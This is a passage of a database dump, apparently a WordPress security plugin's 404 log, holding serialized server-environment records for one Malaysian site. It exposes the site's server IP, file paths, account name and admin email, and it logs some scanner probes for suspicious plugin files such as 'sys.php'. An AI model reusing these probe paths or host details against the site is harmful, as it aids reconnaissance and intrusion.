deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:93:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0 Cyberfox/47.0.2\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.215.168.186\";s:11:\"REMOTE_PORT\";s:5:\"55314\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xab1Cz@QAlIeaTAl5H-XJQAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571222796.0675\";s:12:\"REQUEST_TIME\";s:10:\"1571222796\";}}','notice','2019-10-16 10:46:39','2019-10-16 10:46:36',35463128,37271176,'https://bintara.com.my/?page_id=18',1,0,'178.215.168.186'),(28132,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-33/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-33/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-33/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xab1-twSqwmg3BSzc7-W9AAAAhQ\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-33/\";s:11:\"REMOTE_ADDR\";s:13:\"40.77.167.160\";s:11:\"REMOTE_PORT\";s:4:\"6557\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-33/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-33/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xab1-twSqwmg3BSzc7-W9AAAAhQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571223038.5215\";s:12:\"REQUEST_TIME\";s:10:\"1571223038\";}}','notice','2019-10-16 10:50:40','2019-10-16 10:50:38',33921320,35726312,'https://bintara.com.my/toughbook-33/',1,0,'40.77.167.160'),(28133,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:51:\"/website/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/website/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/website/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xab33D@QAlIeaTAl5H-ZqwAAAFY\";s:19:\"REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/website/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:51:\"/website/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xab33D@QAlIeaTAl5H-ZqwAAAFY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.39.111\";s:11:\"REMOTE_PORT\";s:5:\"44374\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:73:\"https://bintara.com.my/website/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:51:\"/website/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xab33D@QAlIeaTAl5H-ZqwAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571223516.2813\";s:12:\"REQUEST_TIME\";s:10:\"1571223516\";}}','notice','2019-10-16 10:58:38','2019-10-16 10:58:36',35281448,37085768,'https://bintara.com.my/website/wp-content/plugins/solid_best_corp/sys.php',1,0,'166.62.39.111'),(28134,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/website/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:74:\"https://bintara.com.my/website/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:52:\"/website/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xab4JD@QAlIeaTAl5H-Z5AAAAFE\";s:19:\"REDIRECT_SCRIPT_URI\";s:74:\"https://bintara.com.my/website/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:52:\"/website/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xab4JD@QAlIeaTAl5H-Z5AAAAFE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.39.111\";s:11:\"REMOTE_PORT\";s:5:\"39642\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:74:\"https://bintara.com.my/website/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:52:\"/website/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xab4JD@QAlIeaTAl5H-Z5AAAAFE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571223588.2385\";s:12:\"REQUEST_TIME\";s:10:\"1571223588\";}}','notice','2019-10-16 10:59:50','2019-10-16 10:59:48',35447480,37243904,'https://bintara.com.my/website/wp-content/plugins/solid_best_corp/info.php',1,0,'166.62.39.111'),(28135,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2717.400 QQBrowser/9.6.11133.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"5.157.37.36\";s:11:\"REMOTE_PORT\";s:5:\"44479\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xab6GT@QAlIeaTAl5H-cHQAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571224089.328\";s:12:\"REQUEST_TIME\";s:10:\"1571224089\";}}','notice','2019-10-16 11:08:10','2019-10-16 11:08:09',35032160,36841616,'https://bintara.com.my/?page_id=18/contact.php',1,0,'5.157.37.36'),(28136,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571224051.3121399879455566406250\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571224051.3121399879455566406250\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571224051.3121399879455566406250\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571224051.3121399879455566406250\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"41818\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571224051.3121399879455566406250\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xab589wSqwmg3BSzc7-YCgAAAgQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xab589wSqwmg3BSzc7-YCgAAAgQ\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"41818\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xab589wSqwmg3BSzc7-YCgAAAgQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571224965.562\";s:12:\"REQUEST_TIME\";s:10:\"1571224965\";}}','notice','2019-10-16 11:23:02','2019-10-16 11:22:47',35057016,35309184,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571224051.3121399879455566406250',1,0,'103.6.198.69'),(28848,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"E205E9E7-507C-4DC6-A078-5906BF938390\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-@NXlonjnFhdaVmZhWBAAAAQs\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.139.175.208\";s:11:\"REMOTE_PORT\";s:5:\"63829\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa-@NXlonjnFhdaVmZhWBAAAAQs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571814966.0023\";s:12:\"REQUEST_TIME\";s:10:\"1571814966\";}}','notice','2019-10-23 07:16:08','2019-10-23 07:16:06',35278488,37073416,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.175.208'),(28849,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/wordpress/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/wordpress/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAJZXlonjnFhdaVmZheZAAAAQ8\";s:12:\"REDIRECT_URL\";s:11:\"/wordpress/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"52441\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:10:\"SCRIPT_URL\";s:11:\"/wordpress/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAJZXlonj